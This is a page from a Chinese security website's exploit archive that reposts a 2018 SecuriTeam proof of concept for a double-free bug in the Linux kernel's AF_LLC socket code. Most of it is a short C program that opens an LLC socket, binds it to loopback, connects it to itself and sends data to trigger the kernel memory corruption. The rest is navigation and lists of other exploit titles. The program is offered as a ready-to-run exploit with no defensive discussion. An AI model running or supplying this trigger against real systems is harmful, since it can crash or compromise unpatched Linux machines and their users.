首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free
来源:http://www.securiteam.com/ 作者:SecuriTeam 发布时间:2018-05-03  
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
 
struct sockaddr_llc {
 short  sllc_family;
 short  sllc_arphrd;
 unsigned char   sllc_test;
 unsigned char   sllc_xid;
 unsigned char sllc_ua;
 unsigned char   sllc_sap;
 unsigned char   sllc_mac[6];
 unsigned char   __pad[2];
};
 
void test()
{
 int fd = socket(AF_LLC, SOCK_STREAM, 0);
 char output[32] = "lo";
 socklen_t len;
 setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
 struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
 struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));
 
 char msg[0x10] = "aaaa";
 send(fd, msg, 0x10, 0);
}
 
int main()
{
 test();
 return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TBK DVR4104 / DVR4216 - Creden
·Windows - Local Privilege Esca
·GPON Routers - Authentication
·Windows WMI - Recieve Notifica
·Adobe Reader PDF - Client Side
·DeviceLock Plug and Play Audit
·Schneider Electric InduSoft We
·HWiNFO 5.82-3410 - Denial of S
·Exim < 4.90.1 - 'base64d' Remo
·WordPress Plugin User Role Edi
·Metasploit Framework - 'msfd'
·PlaySMS sendfromfile.php Code
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved